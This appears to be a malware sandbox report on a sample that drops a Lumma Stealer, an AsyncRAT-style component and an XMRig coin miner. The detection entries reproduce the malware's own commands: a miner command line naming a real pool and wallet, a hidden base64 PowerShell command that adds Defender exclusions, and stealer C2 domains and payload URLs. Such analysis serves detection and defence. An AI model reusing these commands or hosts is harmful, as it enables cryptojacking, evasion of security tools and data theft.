9.2.aspnet_compiler.exe.208910155f8.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b0580:$s1: %s/%s (Windows NT %lu.%lu 0x4b16b0:$s3: \\.\WinRing0_ 0x4a7e78:$s4: pool_wallet 0x4a3428:$s5: cryptonight 0x4a3438:$s5: cryptonight 0x4a3448:$s5: cryptonight 0x4a3458:$s5: cryptonight 0x4a3470:$s5: cryptonight 0x4a3480:$s5: cryptonight 0x4a3490:$s5: cryptonight 0x4a34a8:$s5: cryptonight 0x4a34b8:$s5: cryptonight 0x4a34d0:$s5: cryptonight 0x4a34e8:$s5: cryptonight 0x4a34f8:$s5: cryptonight 0x4a3508:$s5: cryptonight 0x4a3518:$s5: cryptonight 0x4a3530:$s5: cryptonight 0x4a3548:$s5: cryptonight 0x4a3558:$s5: cryptonight 0x4a3568:$s5: cryptonight
Click to see the 28 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 3512, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6116, ProcessName: AddInProcess.exe

System Summary

Sigma detected: Potential Crypto Mining Activity

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 3512, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6116, ProcessName: AddInProcess.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAH

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe, ParentImage: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe, ParentProcessId: 3060, ParentProcessName: Current.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ProcessId: 3512, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAH

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAH

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6448, ProcessName: svchost.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:25:28.033254+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.6	64325	1.1.1.1	53	UDP

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:25:15.302701+0200	2035595	1	Domain Observed Used for C2 Detected	45.11.229.96	56001	192.168.2.6	49712	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:26:05.243295+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49778	104.21.39.11	443	TCP
2024-09-19T02:26:06.365549+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49780	104.21.39.11	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:26:05.243295+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49778	104.21.39.11	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:26:06.365549+0200	2049812	1	A Network Trojan was detected	192.168.2.6	49780	104.21.39.11	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:26:05.085845+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.2.6	49778	104.21.39.11	443	TCP
2024-09-19T02:26:05.845797+0200	2055880	1	Domain Observed Used for C2 Detected	192.168.2.6	49780	104.21.39.11	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:26:04.577720+0200	2055879	1	Domain Observed Used for C2 Detected	192.168.2.6	55806	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-19T02:25:03.235163+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.6	49730	95.179.241.203	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: tryyudjasudqo.shop	Avira URL Cloud: Label: malware
Source: reggwardssdqw.shop	Avira URL Cloud: Label: malware
Source: licenseodqwmqn.shop	Avira URL Cloud: Label: malware
Source: relaxatinownio.shop	Avira URL Cloud: Label: malware
Source: keennylrwmqlw.shop	Avira URL Cloud: Label: malware
Source: tesecuuweqo.shop	Avira URL Cloud: Label: malware
Source: tendencctywop.shop	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/	Avira URL Cloud: Label: malware
Source: https://eemmbryequo.shop/api	Avira URL Cloud: Label: malware
Source: eemmbryequo.shop	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Avira: detection malicious, Label: HEUR/AGEN.1358722
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen8

Found malware configuration

Source: 24.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tendencctywop.shop", "reggwardssdqw.shop", "eemmbryequo.shop", "tryyudjasudqo.shop", "tesecuuweqo.shop", "licenseodqwmqn.shop", "keennylrwmqlw.shop", "relaxatinownio.shop"], "Build id": "hv0fRu--"}

Multi AV Scanner detection for domain / URL

Source: 2x.si	Virustotal: Detection: 15%	Perma Link
Source: pool.hashvault.pro	Virustotal: Detection: 7%	Perma Link
Source: https://files.catbox.moe/kwfxr7.dll	Virustotal: Detection: 8%	Perma Link
Source: https://2x.si/o3M.dll	Virustotal: Detection: 12%	Perma Link
Source: https://eemmbryequo.shop/api	Virustotal: Detection: 16%	Perma Link
Source: https://eemmbryequo.shop/	Virustotal: Detection: 12%	Perma Link
Source: https://files.catbox.moe/k541xr.dll	Virustotal: Detection: 9%	Perma Link
Source: tesecuuweqo.shop	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Virustotal: Detection: 41%	Perma Link
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\AppData\Roaming\l6E.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\l6E.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Virustotal: Detection: 41%	Perma Link

Multi AV Scanner detection for submitted file

Source: PT54FFSL7ET46RASB.exe	ReversingLabs: Detection: 34%
Source: PT54FFSL7ET46RASB.exe	Virustotal: Detection: 38%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PT54FFSL7ET46RASB.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tryyudjasudqo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: reggwardssdqw.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: relaxatinownio.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tesecuuweqo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: tendencctywop.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: licenseodqwmqn.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: keennylrwmqlw.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: eemmbryequo.shop
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: TeslaBrowser/5.5
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 24.2.RegAsm.exe.400000.0.raw.unpack	String decryptor: hv0fRu--

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.2.aspnet_compiler.exe.2089153ee30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aspnet_compiler.exe.208910155f8.0.raw.unpack, type: UNPACKEDPE
